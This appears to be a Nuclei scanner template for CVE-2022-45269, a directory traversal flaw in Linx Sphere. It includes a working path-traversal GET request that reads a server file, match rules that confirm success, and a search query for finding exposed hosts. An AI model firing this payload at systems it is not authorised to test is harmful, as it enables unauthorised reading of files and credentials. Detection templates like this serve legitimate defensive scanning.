id: CVE-2022-45269 info: name: Linx Sphere - Directory Traversal author: robotshell severity: high description: | A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files. impact: | Unauthenticated attackers can exploit path traversal to read arbitrary files from the server, potentially accessing sensitive configuration files, credentials, and application source code. remediation: | Update Linx Sphere to a version newer than 7.35.ST15 that properly validates file paths and prevents directory traversal attacks. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-45269 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-45269 cwe-id: CWE-22 epss-score: 0.03092 epss-percentile: 0.86055 cpe: cpe:2.3:a:gmaolinx:linx_sphere:7.35.st15:*:*:*:*:*:*:* metadata: vendor: gmaolinx product: linx_sphere fofa-query: "SCS.Web.Server.SPI/1.0" verified: true max-request: 1 tags: cve,cve2022,linx,lfi,scs,vuln http: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../windows/iis.log" matchers-condition: and matchers: - type: word part: body words: - "Component Based Setup" - type: status status: - 200 # digest: 4a0a004730450220096b17ec0319b1ae9b92e48356770eadace31ece4f650daf64075a177804a545022100f5634dece03cfec470d60a420d88a91f18d4853c3198adc6dd7cda35eba45a2c:922c64590222798bb761d5b6d8e72950